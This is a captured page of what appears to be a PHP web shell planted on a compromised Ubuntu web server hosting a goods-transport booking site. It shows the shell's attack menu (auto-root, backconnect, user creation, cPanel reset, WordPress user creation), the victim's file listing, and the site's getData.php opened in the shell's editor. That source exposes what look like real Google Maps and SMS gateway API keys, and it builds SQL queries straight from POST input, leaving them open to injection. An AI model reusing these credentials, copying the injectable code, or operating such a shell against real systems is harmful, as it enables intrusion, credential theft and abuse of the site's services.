Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
maalgaadi /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxr-x
14322
[ DIR ]
drwxrwxr-x
291222
[ DIR ]
drwxrwxr-x
APK
[ DIR ]
drwxrwxr-x
Customer_App
[ DIR ]
drwxrwxr-x
Driver_App
[ DIR ]
drwxrwxr-x
Driver_OnBoarding_App
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
page_fragment
[ DIR ]
drwxrwxr-x
ssl
[ DIR ]
drwxrwxr-x
.htaccess
368
B
-rw-rw-r--
Driver_Icon.jpeg
1.2
KB
-rw-rw-r--
GoogleSpreadSheets.php
918
B
-rw-rw-r--
New file
8.11
KB
-rw-rw-r--
_demoNj.php
4.24
KB
-rw-rw-r--
_demo_AK.php
818
B
-rw-rw-r--
_query_run.php
776
B
-rw-rw-r--
api_validate.php
2.36
KB
-rw-rw-r--
attach-vehicle.html
11.27
KB
-rw-rw-r--
blog.html
12.67
KB
-rw-rw-r--
call.png
860
B
-rw-rw-r--
careers.html
15.19
KB
-rw-rw-r--
currentDriverData.php
1.31
KB
-rw-rw-r--
driver_tracking_detail.php
15.8
KB
-rw-rw-r--
events.html
15.58
KB
-rw-rw-r--
gecko.php
172.83
KB
-rw-rw-r--
getData.php
8.52
KB
-rw-rw-r--
google99ae0657ac3e3c1d.html
53
B
-rw-rw-r--
googleb09350006d774800.html
53
B
-rw-rw-r--
ids.php
178
B
-rw-rw-r--
index.php
52.42
KB
-rw-rw-r--
index2.php
50.04
KB
-rw-rw-r--
info.php
27
B
-rw-rw-r--
live_tracking.php
17.36
KB
-rw-rw-r--
marker-track.png
1.26
KB
-rw-rw-r--
mass.php
133.38
KB
-rw-rw-r--
order-tracking_operation.php
1.82
KB
-rw-rw-r--
privacy-policy.html
18.47
KB
-rw-rw-r--
robots.txt
27
B
-rw-rw-r--
sitemap.xml
670
B
-rw-rw-r--
terms-and-condition.html
55.15
KB
-rw-rw-r--
whatsapp.png
1.71
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getData.php
<?php require_once './page_fragment/define-live.php'; include ('./page_fragment/dbConnect.php'); include ('./page_fragment/dbGeneral.php'); include ('./page_fragment/njGeneral.php'); $dbConObj = new dbConnect(); $dbComObj = new dbGeneral(); $njGenObj = new njGeneral(); $conn = $dbConObj->dbConnect(); $operation = ""; if (isset($_POST['todo'])) { $operation = base64_decode($_POST['todo']); unset($_POST['todo']); } elseif (isset($_GET['todo'])) { $operation = base64_decode($_GET['todo']); unset($_GET['todo']); } if ($operation == "getVechicleData") { $_getCityData = $dbComObj->viewData($conn, "vehicle_category", "*", "1 and delete_status='0' and city_id='" . $_POST['city_id'] . "' and vehicle_name!='Bike'"); if ($dbComObj->num_rows($_getCityData) > 0) { while ($_gdCityData = $dbComObj->fetch_object($_getCityData)) { echo "<option value='" . $_gdCityData->id . "-" . $_gdCityData->vehicle_name . "'>" . $_gdCityData->vehicle_name . "</option>"; } } } else if ($operation == 'getEstimateFare') { $origins = $_POST['latitudeAddPick'] . ',' . $_POST['longitudeAddPick']; $destination = $_POST['latitudeAddDrop'] . ',' . $_POST['longitudeAddDrop']; $city_id = $_POST['city_id']; $vechicle_id = $_POST['vechicle_id']; $wayponts = 1; $vehicleDetails = $dbComObj->fetch_object($dbComObj->viewData($conn, "vehicle_category", "*", "1 and id='" . $vechicle_id . "'")); $baseDistance = $vehicleDetails->base_distance; $distancePercentage = $vehicleDetails->distance_buffer_percentage; $distanceLowerPercentage = $vehicle->lower_distance_buffer; $ratePerKm = $vehicleDetails->rate; $baseFare = $vehicleDetails->base_fare; $hourlyRate = $vehicleDetails->hourly_rate; $url = "https://maps.googleapis.com/maps/api/directions/json?origin=" . $origins . "&destination=" . $destination . "&sensor=false&transit_mode=bus&key=AIzaSyC4YrHXpl0tQhpDXGVt3WU7_bYyaHd0ZbQ"; $json = @file_get_contents($url); $dataDistance = json_decode($json); // print_r($dataDistance); $count = count($dataDistance->routes[0]->legs); $distanceMeter = 0; $durationSec = 0; for ($p = 0; $p < $count; $p++) { $CountBtwWay = count($dataDistance->routes[0]->legs[$p]->steps); //calculate distance btw A to B for all the route btw him for ($m = 0; $m < $CountBtwWay; $m++) { $distanceMeter = $distanceMeter + $dataDistance->routes[0]->legs[$p]->steps[$m]->distance->value; $durationSec = $durationSec + $dataDistance->routes[0]->legs[$p]->steps[$m]->duration->value; } } $distance = $distanceMeter / 1000; //distanceKM $distance = number_format($distanceMeter / 1000, 1, '.', ''); $durationMin = round($durationSec / 60); $time = $durationSec; $timeText = $durationMin; // Estimated upper Distance $temp = number_format((($distanceMeter + round(($distanceMeter * $distancePercentage) / 100)) / 1000), 1, '.', ''); //km converted $upperDistanceInKm = number_format((($distanceMeter + round(($distanceMeter * $distancePercentage)/100)) / 1000), 1, '.', ''); //km converted $temp1 = number_format((($distanceMeter - round(($distanceMeter * $distanceLowerPercentage)/100)) / 1000), 1, '.', ''); $lowerDistanceInKm = $distanceMeter - round(($distanceMeter * $distanceLowerPercentage)/100); // return $distanceMeter; $mainDistanceKm = $distanceMeter / 1000; //echo $mainDistanceKm.'==='; $bookingMaalgaadiSetting = getBookingSetting($city_id); //echo '====kk===';print_r($bookingMaalgaadiSetting);echo '==aa'; $bookingAllowDistanceKm = 10000; if ($mainDistanceKm > $bookingAllowDistanceKm) { echo "For bookings with trip distance more than " . $bookingAllowDistanceKm . " km, please contact us on " . $customerCareNumber . "."; die; } $mainDistance = 0; //$mainDistance = $temp - $baseDistance; $mainDistance = $temp1 - $baseDistance; if ($mainDistance < 0) { $mainDistance = 0; } $totalTripCharge = round($totalTripCharge + ($baseFare + ($ratePerKm * $mainDistance))); //echo $totalTripCharge .'==='.$baseFare.'=='; if ($totalTripCharge > $baseFare) { $totalTripCharge = round($totalTripCharge); } else { $totalTripCharge = round($baseFare); } echo $totalTripCharge; } elseif($operation == 'sendMessageAppLinkOld'){ $_number = $_POST['PhoneNum']; $link = 'https://play.google.com/store/apps/details?id=hvantage.maalgaadicustomer'; //$url = 'https://api.whatsapp.com/send?phone='.$_number.'&text=Dear customer please download the app for book MaalGaadi : '.$link; //Your authentication key $authKey = "85262ARwrcvP1i7555eec59"; $hash = "RoPIaUIwIFi"; $prePiex = "<#>"; //Sender ID,While using route4 sender id should be 6 characters long. $senderId = "MLGADI"; //Your message to send, Add URL encoding here. $message = urlencode('Dear customer please download the app for book MaalGaadi : '.$link); //Define route $route = "4"; //Prepare you post parameters $postData = array( 'authkey' => $authKey, 'mobiles' => $_number, 'message' => $message, 'sender' => $senderId, 'route' => $route ); //API URL //$url = "https://vtermination.com/sendhttp.php"; $url="https://sms.abinfotech.net/api/sendhttp.php"; // init the resource $ch = curl_init(); curl_setopt_array($ch, array( CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $postData //,CURLOPT_FOLLOWLOCATION => true )); //Ignore SSL certificate verification curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); //get response $output = curl_exec($ch); echo '1'; } elseif($operation == 'sendMessageAppLink'){ $_number = $_POST['PhoneNum']; $link1 = 'https://bit.ly'; $link2 = '/3HFw84T'; //Your authentication key $authKey = "119963A2o9hhJL57905e03"; $hash = "RoPIaUIwIFi"; $prePiex = "<#>"; //Sender ID,While using route4 sender id should be 6 characters long. $senderId = "DCNPLR"; $country = '91'; $DLT_TE_ID = '1307164662560522370'; //Your message to send, Add URL encoding here. $message = urlencode('Dear customer please download the app for book MaalGaadi : '.$link1.''.$link2.' DCNPL MaalGaadi'); //Define route $route = "4"; //Prepare you post parameters $postData = array( 'authkey' => $authKey, 'mobiles' => $_number, 'message' => $message, 'sender' => $senderId, 'route' => $route, 'country' => $country, 'DLT_TE_ID' => $DLT_TE_ID ); //API URL //$url = "https://vtermination.com/sendhttp.php"; $url="https://www.sms.abinfotech.net/api/sendhttp.php?"; // init the resource $ch = curl_init(); curl_setopt_array($ch, array( CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $postData //,CURLOPT_FOLLOWLOCATION => true )); //Ignore SSL certificate verification curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); //get response $output = curl_exec($ch); echo '1'; } function getBookingSetting($cityId) { $dbConObjNew = new dbConnect(); $dbComObjNew = new dbGeneral(); $njGenObjNew = new njGeneral(); $connNew = $dbConObjNew->dbConnect(); $maalgaadiSettings = $dbComObjNew->fetch_object($dbComObjNew->viewData($connNew, "maalgaadi_settings", "*", "1 and city_id='".$cityId."'")); $array['success']['message'] = "ok"; $array['success']['data'] = $maalgaadiSettings; return $array; } ?>
Close